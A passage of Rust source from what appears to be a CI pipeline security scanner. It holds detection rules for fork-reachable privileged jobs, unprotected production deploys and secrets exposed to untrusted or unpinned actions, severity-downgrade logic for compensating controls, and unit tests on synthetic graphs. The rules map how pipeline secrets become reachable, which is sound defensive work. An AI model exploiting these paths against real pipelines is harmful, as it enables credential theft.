}
let job = step
.metadata
.get(META_JOB_NAME)
.cloned()
.unwrap_or_else(|| step.name.clone());
let guarded = step
.metadata
.get(META_FORK_CHECK)
.map(|v| v == "true")
.unwrap_or(false);
let entry = per_job.entry(job).or_insert((false, false));
if guarded {
entry.0 = true;
} else {
entry.1 = true;
}
}
// Need >= 2 distinct privileged jobs; >= 1 fully-guarded job and >= 1
// job with at least one unguarded privileged step.
if per_job.len() < 2 {
return Vec::new();
}
let fully_guarded: Vec<&String> = per_job
.iter()
.filter(|(_, (g, u))| *g && !*u)
.map(|(k, _)| k)
.collect();
let unguarded: Vec<&String> = per_job
.iter()
.filter(|(_, (_, u))| *u)
.map(|(k, _)| k)
.collect();
if fully_guarded.is_empty() || unguarded.is_empty() {
return Vec::new();
}
let severity = if unguarded.len() >= 2 {
Severity::High
} else {
Severity::Medium
};
let guarded_label = fully_guarded
.iter()
.map(|s| s.as_str())
.collect::<Vec<_>>()
.join(", ");
let unguarded_label = unguarded
.iter()
.map(|s| s.as_str())
.collect::<Vec<_>>()
.join(", ");
vec![Finding {
severity,
category: FindingCategory::PullRequestWorkflowInconsistentForkCheck,
path: None,
nodes_involved: Vec::new(),
message: format!(
"PR-triggered workflow ('{trigger}') applies the standard fork-check \
(`github.event.pull_request.head.repo.fork == false` or equivalent) on \
privileged jobs [{guarded_label}] but NOT on [{unguarded_label}] — the \
unguarded jobs hold authority that fork PRs can reach"
),
recommendation: Recommendation::Manual {
action: format!(
"Add `if: github.event.pull_request.head.repo.fork == false` (or \
`github.event.pull_request.head.repo.full_name == github.repository`) to the \
privileged steps in [{unguarded_label}]. Match the pattern already used by \
[{guarded_label}] in the same workflow."
),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
}]
}
/// Rule: GitLab job with a production-named `environment:` binding has no
/// `rules:` / `only:` clause restricting it to protected branches. The job
/// runs (or attempts to run) on every pipeline trigger; if branch
/// protection is later relaxed the deploy becomes runnable from
/// unprotected branches without any code change.
///
/// Detection (per Step in a GitLab graph):
/// * `META_PLATFORM == "gitlab"`
/// * Step carries `environment_name` matching a production token
/// (`prod`, `production`, `prd`)
/// * Step does NOT carry `META_RULES_PROTECTED_ONLY`
///
/// Severity: Medium.
pub fn gitlab_deploy_job_missing_protected_branch_only(graph: &AuthorityGraph) -> Vec<Finding> {
if !graph_is_platform(graph, "gitlab") {
return Vec::new();
}
let mut findings = Vec::new();
for step in graph.nodes_of_kind(NodeKind::Step) {
let env_name = match step.metadata.get("environment_name") {
Some(n) => n.clone(),
None => continue,
};
if !looks_like_prod_connection(&env_name) {
continue;
}
let protected = step
.metadata
.get(META_RULES_PROTECTED_ONLY)
.map(|v| v == "true")
.unwrap_or(false);
if protected {
continue;
}
findings.push(Finding {
severity: Severity::Medium,
category: FindingCategory::GitlabDeployJobMissingProtectedBranchOnly,
path: None,
nodes_involved: vec![step.id],
message: format!(
"GitLab deploy job '{}' targets production environment '{}' but has no \
`rules:` / `only:` clause restricting it to protected branches — every MR \
and every push will attempt to run the deploy",
step.name, env_name
),
recommendation: Recommendation::Manual {
action: "Add `rules: - if: '$CI_COMMIT_REF_PROTECTED == \"true\"'` to the job, \
or `only: [main]` for the simplest case. This survives future \
changes to branch-protection settings."
.into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
findings
}
// ── Compensating-control suppressions ────────────────────────
//
// These suppressions DOWNGRADE or REMOVE existing-rule findings when the
// graph carries a control that neutralises (or substantially mitigates)
// the underlying risk. Applied as a post-processing pass so each
// suppression can see both the finding and the surrounding graph state.
//
// Design intent (from the blue-team corpus defense report):
// * downgrade > suppress: keep the finding visible at a lower severity
// so it still surfaces in audits, but stop competing for triage time
// with un-mitigated criticals
// * never *delete* a finding silently — every suppression appends an
// explanation suffix to the message describing the compensating
// control taudit credited
//
// Suppressions implemented here:
// 1. `checkout_self_pr_exposure` downgraded when the same job has no
// privileged steps (no Secret/Identity access and no env-gate writes).
// 2. `trigger_context_mismatch` downgraded when every privileged step
// in the workflow carries the standard fork-check `if:`.
// 3. `over_privileged_identity` suppressed when the workflow-level
// identity is broad but at least one job-level override narrows the
// scope (job-level wins at runtime).
// 4. `terraform_auto_approve_in_prod` downgraded — not skipped — when an
// `environment:` gate is present (replaces the previous early-skip
// which discarded the finding entirely).
fn apply_compensating_controls(graph: &AuthorityGraph, findings: &mut [Finding]) {
// Pre-compute graph-level signals once so the per-finding loop stays
// O(N findings) rather than O(N findings × M nodes).
let mut all_authority_steps_have_fork_check = true;
let mut any_authority_step_seen = false;
for step in graph.nodes_of_kind(NodeKind::Step) {
let holds_authority = graph.edges_from(step.id).any(|e| {
e.kind == EdgeKind::HasAccessTo
&& graph
.node(e.to)
.map(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
.unwrap_or(false)
});
if !holds_authority {
continue;
}
any_authority_step_seen = true;
let guarded = step
.metadata
.get(META_FORK_CHECK)
.map(|v| v == "true")
.unwrap_or(false);
if !guarded {
all_authority_steps_have_fork_check = false;
}
}
let fork_check_universal = any_authority_step_seen && all_authority_steps_have_fork_check;
// For Suppression 1, build per-job: does any step in the job have
// access to a Secret/Identity OR write to the env gate?
use std::collections::{BTreeMap, BTreeSet};
let mut job_has_privileged_step: BTreeMap<String, bool> = BTreeMap::new();
for step in graph.nodes_of_kind(NodeKind::Step) {
let job = match step.metadata.get(META_JOB_NAME) {
Some(j) => j.clone(),
None => continue,
};
let privileged = graph.edges_from(step.id).any(|e| {
e.kind == EdgeKind::HasAccessTo
&& graph
.node(e.to)
.map(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
.unwrap_or(false)
}) || step
.metadata
.get(META_WRITES_ENV_GATE)
.map(|v| v == "true")
.unwrap_or(false);
let entry = job_has_privileged_step.entry(job).or_insert(false);
if privileged {
*entry = true;
}
}
// For Suppression 3 — over_privileged_identity — collect the names of
// narrower per-job identity overrides so we can credit them when the
// broad workflow-level identity fires.
let job_level_narrow_overrides: BTreeSet<String> = graph
.nodes_of_kind(NodeKind::Identity)
.filter(|n| {
n.name.starts_with("GITHUB_TOKEN (")
&& n.metadata
.get(META_IDENTITY_SCOPE)
.map(|s| s == "constrained")
.unwrap_or(false)
})
.map(|n| n.name.clone())
.collect();
for finding in findings.iter_mut() {
match finding.category {
// ── Suppression 1: checkout_self_pr_exposure
FindingCategory::CheckoutSelfPrExposure => {
// Identify the checkout step (first node in nodes_involved)
// and look up its job. If the job has no privileged steps,
// the checkout is read-only — downgrade to Info.
let job = finding
.nodes_involved
.first()
.and_then(|id| graph.node(*id))
.and_then(|n| n.metadata.get(META_JOB_NAME).cloned());
let job_privileged = job
.as_ref()
.and_then(|j| job_has_privileged_step.get(j).copied())
.unwrap_or(true); // unknown → conservative: keep High
if !job_privileged {
finding.severity = Severity::Info;
finding.message.push_str(
" (downgraded: no privileged steps in same job — \
checkout is read-only for lint/test/analysis)",
);
}
}
// ── Suppression 2: trigger_context_mismatch
FindingCategory::TriggerContextMismatch => {
if fork_check_universal {
// Critical → Medium (not Info — the trigger choice itself
// is still risky enough to keep visible for audit).
finding.severity = match finding.severity {
Severity::Critical => Severity::Medium,
s => downgrade_one_step(s),
};
finding.message.push_str(
" (downgraded: every privileged job in this workflow carries the \
standard fork-check `if:` — fork PRs cannot reach the privileged steps)",
);
}
}
// ── Suppression 3: over_privileged_identity
FindingCategory::OverPrivilegedIdentity => {
// Only relevant when the firing identity IS the
// workflow-level GITHUB_TOKEN AND at least one job has its
// own narrower override.
let firing_node_name = finding
.nodes_involved
.first()
.and_then(|id| graph.node(*id))
.map(|n| n.name.clone());
let is_workflow_level_token = firing_node_name.as_deref() == Some("GITHUB_TOKEN");
if is_workflow_level_token && !job_level_narrow_overrides.is_empty() {
// Suppress by reducing to Info — the runtime identity
// any job actually uses is the narrower job-level one.
finding.severity = Severity::Info;
let mut narrower: Vec<&str> = job_level_narrow_overrides
.iter()
.map(|s| s.as_str())
.collect();
narrower.sort_unstable();
finding.message.push_str(&format!(
" (suppressed: job-level permissions narrow this scope at runtime — \
see {})",
narrower.join(", ")
));
}
}
// ── Suppression 4: terraform_auto_approve_in_prod
//
// The pre-existing rule already early-skipped
// env-gated steps, so it never emits a finding to downgrade.
// Downgrade is wired into the rule body itself (search for
// `env_gated`) — kept as a no-op match arm here so future
// contributors can find the suppression-pass alongside the
// others.
FindingCategory::TerraformAutoApproveInProd => { /* see rule body */ }
_ => {}
}
}
}
#[cfg(test)]
mod tests {
use super::*;
use crate::graph::*;
fn source(file: &str) -> PipelineSource {
PipelineSource {
file: file.into(),
repo: None,
git_ref: None,
commit_sha: None,
}
}
#[test]
fn unpinned_third_party_action_flagged() {
let mut g = AuthorityGraph::new(source("ci.yml"));
g.add_node(
NodeKind::Image,
"actions/checkout@v4",
TrustZone::ThirdParty,
);
let findings = unpinned_action(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].category, FindingCategory::UnpinnedAction);
}
#[test]
fn pinned_action_not_flagged() {
let mut g = AuthorityGraph::new(source("ci.yml"));
g.add_node(
NodeKind::Image,
"actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29",
TrustZone::ThirdParty,
);
let findings = unpinned_action(&g);
assert!(findings.is_empty());
}
#[test]
fn untrusted_step_with_secret_is_critical() {
let mut g = AuthorityGraph::new(source("ci.yml"));
let step = g.add_node(NodeKind::Step, "evil-action", TrustZone::Untrusted);
let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
g.add_edge(step, secret, EdgeKind::HasAccessTo);
let findings = untrusted_with_authority(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].severity, Severity::Critical);
}
#[test]
fn implicit_identity_downgrades_to_info() {
let mut g = AuthorityGraph::new(source("ci.yml"));
let step = g.add_node(NodeKind::Step, "AzureCLI@2", TrustZone::Untrusted);
let mut meta = std::collections::HashMap::new();
meta.insert(META_IMPLICIT.into(), "true".into());
meta.insert(META_IDENTITY_SCOPE.into(), "broad".into());
let token = g.add_node_with_metadata(
NodeKind::Identity,
"System.AccessToken",
TrustZone::FirstParty,
meta,
);
g.add_edge(step, token, EdgeKind::HasAccessTo);
let findings = untrusted_with_authority(&g);
assert_eq!(findings.len(), 1);
assert_eq!(
findings[0].severity,
Severity::Info,
"implicit token must be Info not Critical"
);
assert!(findings[0].message.contains("platform-injected"));
}
#[test]
fn explicit_secret_remains_critical_despite_implicit_token() {
let mut g = AuthorityGraph::new(source("ci.yml"));
let step = g.add_node(NodeKind::Step, "AzureCLI@2", TrustZone::Untrusted);
// implicit token → Info
let mut meta = std::collections::HashMap::new();
meta.insert(META_IMPLICIT.into(), "true".into());
let token = g.add_node_with_metadata(
NodeKind::Identity,
"System.AccessToken",
TrustZone::FirstParty,
meta,
);
// explicit secret → Critical
let secret = g.add_node(NodeKind::Secret, "ARM_CLIENT_SECRET", TrustZone::FirstParty);
g.add_edge(step, token, EdgeKind::HasAccessTo);
g.add_edge(step, secret, EdgeKind::HasAccessTo);
let findings = untrusted_with_authority(&g);
assert_eq!(findings.len(), 2);
let info = findings
.iter()
.find(|f| f.severity == Severity::Info)
.unwrap();
let crit = findings
.iter()
.find(|f| f.severity == Severity::Critical)
.unwrap();
assert!(info.message.contains("platform-injected"));
assert!(crit.message.contains("ARM_CLIENT_SECRET"));
}
#[test]
fn artifact_crossing_detected() {
let mut g = AuthorityGraph::new(source("ci.yml"));
let secret = g.add_node(NodeKind::Secret, "KEY", TrustZone::FirstParty);
let build = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
let artifact = g.add_node(NodeKind::Artifact, "dist.zip", TrustZone::FirstParty);
let deploy = g.add_node(NodeKind::Step, "deploy", TrustZone::ThirdParty);
g.add_edge(build, secret, EdgeKind::HasAccessTo);
g.add_edge(build, artifact, EdgeKind::Produces);
g.add_edge(artifact, deploy, EdgeKind::Consumes);
let findings = artifact_boundary_crossing(&g);
assert_eq!(findings.len(), 1);
assert_eq!(
findings[0].category,
FindingCategory::ArtifactBoundaryCrossing
);
}
#[test]
fn propagation_to_sha_pinned_is_high_not_critical() {
let mut g = AuthorityGraph::new(source("ci.yml"));
let mut meta = std::collections::HashMap::new();
meta.insert(
"digest".into(),
"a5ac7e51b41094c92402da3b24376905380afc29".into(),
);
let identity = g.add_node(NodeKind::Identity, "GITHUB_TOKEN", TrustZone::FirstParty);
let step = g.add_node(NodeKind::Step, "checkout", TrustZone::ThirdParty);
let image = g.add_node_with_metadata(
NodeKind::Image,
"actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29",
TrustZone::ThirdParty,
meta,
);
g.add_edge(step, identity, EdgeKind::HasAccessTo);
g.add_edge(step, image, EdgeKind::UsesImage);
let findings = authority_propagation(&g, 4);
// Should find propagation to the SHA-pinned image
let image_findings: Vec<_> = findings
.iter()
.filter(|f| f.nodes_involved.contains(&image))
.collect();
assert!(!image_findings.is_empty());
// SHA-pinned targets get High, not Critical (non-OIDC source)
assert_eq!(image_findings[0].severity, Severity::High);
}
#[test]
fn oidc_identity_to_pinned_third_party_is_critical() {
let mut g = AuthorityGraph::new(source("ci.yml"));
// OIDC-federated cloud identity — token itself is the threat
let mut id_meta = std::collections::HashMap::new();
id_meta.insert(META_OIDC.into(), "true".into());
let identity = g.add_node_with_metadata(
NodeKind::Identity,
"AWS_OIDC_ROLE",
TrustZone::FirstParty,
id_meta,
);
// SHA-pinned ThirdParty image — would normally be High without OIDC
let mut img_meta = std::collections::HashMap::new();
img_meta.insert(
META_DIGEST.into(),
"a5ac7e51b41094c92402da3b24376905380afc29".into(),
);
let image = g.add_node_with_metadata(
NodeKind::Image,
"aws-actions/configure-aws-credentials@a5ac7e51b41094c92402da3b24376905380afc29",
TrustZone::ThirdParty,
img_meta,
);
// Step in ThirdParty zone holds the OIDC identity and uses the pinned image
let step = g.add_node(
NodeKind::Step,
"configure-aws-credentials",
TrustZone::ThirdParty,
);
g.add_edge(step, identity, EdgeKind::HasAccessTo);
g.add_edge(step, image, EdgeKind::UsesImage);
let findings = authority_propagation(&g, 4);
let image_findings: Vec<_> = findings
.iter()
.filter(|f| f.nodes_involved.contains(&image))
.collect();
assert!(
!image_findings.is_empty(),
"expected OIDC→pinned propagation finding"
);
// OIDC source escalates pinned ThirdParty from High → Critical
assert_eq!(image_findings[0].severity, Severity::Critical);
}
#[test]
fn propagation_to_untrusted_is_critical() {
let mut g = AuthorityGraph::new(source("ci.yml"));
let identity = g.add_node(NodeKind::Identity, "GITHUB_TOKEN", TrustZone::FirstParty);
let step = g.add_node(NodeKind::Step, "deploy", TrustZone::Untrusted);
let image = g.add_node(NodeKind::Image, "evil/action@main", TrustZone::Untrusted);
g.add_edge(step, identity, EdgeKind::HasAccessTo);
g.add_edge(step, image, EdgeKind::UsesImage);
let findings = authority_propagation(&g, 4);
let image_findings: Vec<_> = findings
.iter()
.filter(|f| f.nodes_involved.contains(&image))
.collect();
assert!(!image_findings.is_empty());
assert_eq!(image_findings[0].severity, Severity::Critical);
}
#[test]
fn long_lived_credential_detected() {
let mut g = AuthorityGraph::new(source("ci.yml"));
g.add_node(NodeKind::Secret, "AWS_ACCESS_KEY_ID", TrustZone::FirstParty);
g.add_node(NodeKind::Secret, "NPM_TOKEN", TrustZone::FirstParty);
g.add_node(NodeKind::Secret, "DEPLOY_API_KEY", TrustZone::FirstParty);
// Non-matching names
g.add_node(NodeKind::Secret, "CACHE_TTL", TrustZone::FirstParty);
let findings = long_lived_credential(&g);
assert_eq!(findings.len(), 2); // AWS_ACCESS_KEY_ID + DEPLOY_API_KEY
assert!(findings
.iter()
.all(|f| f.category == FindingCategory::LongLivedCredential));
}
#[test]
fn duplicate_unpinned_actions_deduplicated() {
let mut g = AuthorityGraph::new(source("ci.yml"));
// Same action used in two jobs — two Image nodes, same name
g.add_node(NodeKind::Image, "actions/checkout@v4", TrustZone::Untrusted);
g.add_node(NodeKind::Image, "actions/checkout@v4", TrustZone::Untrusted);
g.add_node(
NodeKind::Image,
"actions/setup-node@v3",
TrustZone::Untrusted,
);
let findings = unpinned_action(&g);
// Should get 2 findings (checkout + setup-node), not 3
assert_eq!(findings.len(), 2);
}
#[test]
fn broad_identity_scope_flagged_as_high() {
let mut g = AuthorityGraph::new(source("ci.yml"));
let mut meta = std::collections::HashMap::new();
meta.insert(META_PERMISSIONS.into(), "write-all".into());
meta.insert(META_IDENTITY_SCOPE.into(), "broad".into());
let identity = g.add_node_with_metadata(
NodeKind::Identity,
"GITHUB_TOKEN",
TrustZone::FirstParty,
meta,
);
let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
g.add_edge(step, identity, EdgeKind::HasAccessTo);
let findings = over_privileged_identity(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].severity, Severity::High);
assert!(findings[0].message.contains("broad"));
}
#[test]
fn unknown_identity_scope_flagged_as_medium() {
let mut g = AuthorityGraph::new(source("ci.yml"));
let mut meta = std::collections::HashMap::new();
meta.insert(META_PERMISSIONS.into(), "custom-scope".into());
meta.insert(META_IDENTITY_SCOPE.into(), "unknown".into());
let identity = g.add_node_with_metadata(
NodeKind::Identity,
"GITHUB_TOKEN",
TrustZone::FirstParty,
meta,
);
let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
g.add_edge(step, identity, EdgeKind::HasAccessTo);
let findings = over_privileged_identity(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].severity, Severity::Medium);
assert!(findings[0].message.contains("unknown"));
}
#[test]
fn floating_image_unpinned_container_flagged() {
let mut g = AuthorityGraph::new(source("ci.yml"));
let mut meta = std::collections::HashMap::new();
meta.insert(META_CONTAINER.into(), "true".into());
g.add_node_with_metadata(NodeKind::Image, "ubuntu:22.04", TrustZone::Untrusted, meta);
let findings = floating_image(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].category, FindingCategory::FloatingImage);
assert_eq!(findings[0].severity, Severity::Medium);
}
#[test]
fn partial_graph_caps_critical_findings_at_high() {
let mut g = AuthorityGraph::new(source("ci.yml"));
g.mark_partial("matrix strategy hides some authority paths");
let identity = g.add_node(NodeKind::Identity, "GITHUB_TOKEN", TrustZone::FirstParty);
let step = g.add_node(NodeKind::Step, "deploy", TrustZone::Untrusted);
let image = g.add_node(NodeKind::Image, "evil/action@main", TrustZone::Untrusted);
g.add_edge(step, identity, EdgeKind::HasAccessTo);
g.add_edge(step, image, EdgeKind::UsesImage);
let findings = run_all_rules(&g, 4);
assert!(findings
.iter()
.any(|f| f.category == FindingCategory::AuthorityPropagation));
assert!(findings
.iter()
.any(|f| f.category == FindingCategory::UntrustedWithAuthority));
assert!(findings.iter().all(|f| f.severity >= Severity::High));
assert!(!findings.iter().any(|f| f.severity == Severity::Critical));
}
#[test]
fn complete_graph_keeps_critical_findings() {
let mut g = AuthorityGraph::new(source("ci.yml"));
let identity = g.add_node(NodeKind::Identity, "GITHUB_TOKEN", TrustZone::FirstParty);
let step = g.add_node(NodeKind::Step, "deploy", TrustZone::Untrusted);
let image = g.add_node(NodeKind::Image, "evil/action@main", TrustZone::Untrusted);
g.add_edge(step, identity, EdgeKind::HasAccessTo);
g.add_edge(step, image, EdgeKind::UsesImage);
let findings = run_all_rules(&g, 4);
assert!(findings.iter().any(|f| f.severity == Severity::Critical));
}
#[test]
fn floating_image_digest_pinned_container_not_flagged() {
let mut g = AuthorityGraph::new(source("ci.yml"));
let mut meta = std::collections::HashMap::new();
meta.insert(META_CONTAINER.into(), "true".into());
g.add_node_with_metadata(
NodeKind::Image,
"ubuntu@sha256:a5ac7e51b41094c92402da3b24376905380afc29a5ac7e51b41094c92402da3b",
TrustZone::ThirdParty,
meta,
);
let findings = floating_image(&g);
assert!(
findings.is_empty(),
"digest-pinned container should not be flagged"
);
}
#[test]
fn unpinned_action_does_not_flag_container_images() {
// Regression: container Image nodes are handled by floating_image, not unpinned_action.
// The same node must not generate findings from both rules.
let mut g = AuthorityGraph::new(source("ci.yml"));
let mut meta = std::collections::HashMap::new();
meta.insert(META_CONTAINER.into(), "true".into());
g.add_node_with_metadata(NodeKind::Image, "ubuntu:22.04", TrustZone::Untrusted, meta);
let findings = unpinned_action(&g);
assert!(
findings.is_empty(),
"unpinned_action must skip container images to avoid double-flagging"
);
}
#[test]
fn floating_image_ignores_action_images() {
let mut g = AuthorityGraph::new(source("ci.yml"));
// Image node without META_CONTAINER — this is a step uses: action, not a container
g.add_node(NodeKind::Image, "actions/checkout@v4", TrustZone::Untrusted);
let findings = floating_image(&g);
assert!(
findings.is_empty(),
"floating_image should not flag step actions"
);
}
#[test]
fn persisted_credential_rule_fires_on_persists_to_edge() {
let mut g = AuthorityGraph::new(source("ci.yml"));
let token = g.add_node(
NodeKind::Identity,
"System.AccessToken",
TrustZone::FirstParty,
);
let checkout = g.add_node(NodeKind::Step, "checkout", TrustZone::FirstParty);
g.add_edge(checkout, token, EdgeKind::PersistsTo);
let findings = persisted_credential(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].category, FindingCategory::PersistedCredential);
assert_eq!(findings[0].severity, Severity::High);
assert!(findings[0].message.contains("persistCredentials"));
}
#[test]
fn untrusted_with_cli_flag_exposed_secret_notes_log_exposure() {
let mut g = AuthorityGraph::new(source("ci.yml"));
let step = g.add_node(NodeKind::Step, "TerraformCLI@0", TrustZone::Untrusted);
let mut meta = std::collections::HashMap::new();
meta.insert(META_CLI_FLAG_EXPOSED.into(), "true".into());
let secret =
g.add_node_with_metadata(NodeKind::Secret, "db_password", TrustZone::FirstParty, meta);
g.add_edge(step, secret, EdgeKind::HasAccessTo);
let findings = untrusted_with_authority(&g);
assert_eq!(findings.len(), 1);
assert!(
findings[0].message.contains("-var flag"),
"message should note -var flag log exposure"
);
assert!(matches!(
findings[0].recommendation,
Recommendation::Manual { .. }
));
}
#[test]
fn constrained_identity_scope_not_flagged() {
let mut g = AuthorityGraph::new(source("ci.yml"));
let mut meta = std::collections::HashMap::new();
meta.insert(META_PERMISSIONS.into(), "{ contents: read }".into());
meta.insert(META_IDENTITY_SCOPE.into(), "constrained".into());
let identity = g.add_node_with_metadata(
NodeKind::Identity,
"GITHUB_TOKEN",
TrustZone::FirstParty,
meta,
);
let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
g.add_edge(step, identity, EdgeKind::HasAccessTo);
let findings = over_privileged_identity(&g);
assert!(
findings.is_empty(),
"constrained scope should not be flagged"
);
}
#[test]
fn trigger_context_mismatch_fires_on_pull_request_target_with_secret() {
let mut g = AuthorityGraph::new(source("ci.yml"));
g.metadata
.insert(META_TRIGGER.into(), "pull_request_target".into());
let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
g.add_edge(step, secret, EdgeKind::HasAccessTo);
let findings = trigger_context_mismatch(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].severity, Severity::Critical);
assert_eq!(
findings[0].category,
FindingCategory::TriggerContextMismatch
);
}
#[test]
fn trigger_context_mismatch_no_fire_without_trigger_metadata() {
let mut g = AuthorityGraph::new(source("ci.yml"));
let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
g.add_edge(step, secret, EdgeKind::HasAccessTo);
let findings = trigger_context_mismatch(&g);
assert!(findings.is_empty(), "no trigger metadata → no finding");
}
#[test]
fn cross_workflow_authority_chain_detected() {
let mut g = AuthorityGraph::new(source("ci.yml"));
let step = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
let external = g.add_node(
NodeKind::Image,
"evil/workflow.yml@main",
TrustZone::Untrusted,
);
g.add_edge(step, secret, EdgeKind::HasAccessTo);
g.add_edge(step, external, EdgeKind::DelegatesTo);
let findings = cross_workflow_authority_chain(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].severity, Severity::Critical);
assert_eq!(
findings[0].category,
FindingCategory::CrossWorkflowAuthorityChain
);
}
#[test]
fn cross_workflow_authority_chain_no_fire_if_local_delegation() {
let mut g = AuthorityGraph::new(source("ci.yml"));
let step = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
let local = g.add_node(NodeKind::Image, "./local-action", TrustZone::FirstParty);
g.add_edge(step, secret, EdgeKind::HasAccessTo);
g.add_edge(step, local, EdgeKind::DelegatesTo);
let findings = cross_workflow_authority_chain(&g);
assert!(
findings.is_empty(),
"FirstParty delegation should not be flagged"
);
}
#[test]
fn authority_cycle_detected() {
let mut g = AuthorityGraph::new(source("ci.yml"));
let a = g.add_node(NodeKind::Step, "A", TrustZone::FirstParty);
let b = g.add_node(NodeKind::Step, "B", TrustZone::FirstParty);
g.add_edge(a, b, EdgeKind::DelegatesTo);
g.add_edge(b, a, EdgeKind::DelegatesTo);
let findings = authority_cycle(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].category, FindingCategory::AuthorityCycle);
assert_eq!(findings[0].severity, Severity::High);
}
#[test]
fn authority_cycle_no_fire_for_acyclic_graph() {
let mut g = AuthorityGraph::new(source("ci.yml"));
let a = g.add_node(NodeKind::Step, "A", TrustZone::FirstParty);
let b = g.add_node(NodeKind::Step, "B", TrustZone::FirstParty);
let c = g.add_node(NodeKind::Step, "C", TrustZone::FirstParty);
g.add_edge(a, b, EdgeKind::DelegatesTo);
g.add_edge(b, c, EdgeKind::DelegatesTo);
let findings = authority_cycle(&g);
assert!(findings.is_empty(), "acyclic graph must not fire");
}
#[test]
fn uplift_without_attestation_fires_when_oidc_no_attests() {
let mut g = AuthorityGraph::new(source("ci.yml"));
let mut meta = std::collections::HashMap::new();
meta.insert(META_OIDC.into(), "true".into());
let identity = g.add_node_with_metadata(
NodeKind::Identity,
"AWS/deploy-role",
TrustZone::FirstParty,
meta,
);
let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
g.add_edge(step, identity, EdgeKind::HasAccessTo);
let findings = uplift_without_attestation(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].severity, Severity::Info);
assert_eq!(
findings[0].category,
FindingCategory::UpliftWithoutAttestation
);
}
#[test]
fn uplift_without_attestation_no_fire_when_attests_present() {
let mut g = AuthorityGraph::new(source("ci.yml"));
let mut id_meta = std::collections::HashMap::new();
id_meta.insert(META_OIDC.into(), "true".into());
let identity = g.add_node_with_metadata(
NodeKind::Identity,
"AWS/deploy-role",
TrustZone::FirstParty,
id_meta,
);
let mut step_meta = std::collections::HashMap::new();
step_meta.insert(META_ATTESTS.into(), "true".into());
let attest_step =
g.add_node_with_metadata(NodeKind::Step, "attest", TrustZone::FirstParty, step_meta);
let build_step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
g.add_edge(build_step, identity, EdgeKind::HasAccessTo);
// Touch attest_step so the variable is used (avoid unused warning)
let _ = attest_step;
let findings = uplift_without_attestation(&g);
assert!(findings.is_empty(), "attestation present → no finding");
}
#[test]
fn uplift_without_attestation_no_fire_without_oidc() {
let mut g = AuthorityGraph::new(source("ci.yml"));
let mut meta = std::collections::HashMap::new();
meta.insert(META_PERMISSIONS.into(), "write-all".into());
meta.insert(META_IDENTITY_SCOPE.into(), "broad".into());
// Note: no META_OIDC
let identity = g.add_node_with_metadata(
NodeKind::Identity,
"GITHUB_TOKEN",
TrustZone::FirstParty,
meta,
);
let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
g.add_edge(step, identity, EdgeKind::HasAccessTo);
let findings = uplift_without_attestation(&g);
assert!(
findings.is_empty(),
"broad identity without OIDC must not fire"
);
}
#[test]
fn self_mutating_pipeline_untrusted_is_critical() {
let mut g = AuthorityGraph::new(source("ci.yml"));
let mut meta = std::collections::HashMap::new();
meta.insert(META_WRITES_ENV_GATE.into(), "true".into());
g.add_node_with_metadata(NodeKind::Step, "fork-step", TrustZone::Untrusted, meta);
let findings = self_mutating_pipeline(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].severity, Severity::Critical);
assert_eq!(findings[0].category, FindingCategory::SelfMutatingPipeline);
}
#[test]
fn self_mutating_pipeline_privileged_step_is_high() {
let mut g = AuthorityGraph::new(source("ci.yml"));
let mut meta = std::collections::HashMap::new();
meta.insert(META_WRITES_ENV_GATE.into(), "true".into());
let step = g.add_node_with_metadata(NodeKind::Step, "build", TrustZone::FirstParty, meta);
let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
g.add_edge(step, secret, EdgeKind::HasAccessTo);
let findings = self_mutating_pipeline(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].severity, Severity::High);
}
#[test]
fn trigger_context_mismatch_fires_on_ado_pr_with_secret_as_high() {
let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
g.metadata.insert(META_TRIGGER.into(), "pr".into());
let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
g.add_edge(step, secret, EdgeKind::HasAccessTo);
let findings = trigger_context_mismatch(&g);
assert_eq!(findings.len(), 1);
assert_eq!(findings[0].severity, Severity::High);
assert_eq!(
findings[0].category,
FindingCategory::TriggerContextMismatch
);
}
#[test]
fn cross_workflow_authority_chain_third_party_is_high() {
let mut g = AuthorityGraph::new(source("ci.yml"));
let step = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
// ThirdParty target (SHA-pinned external workflow)
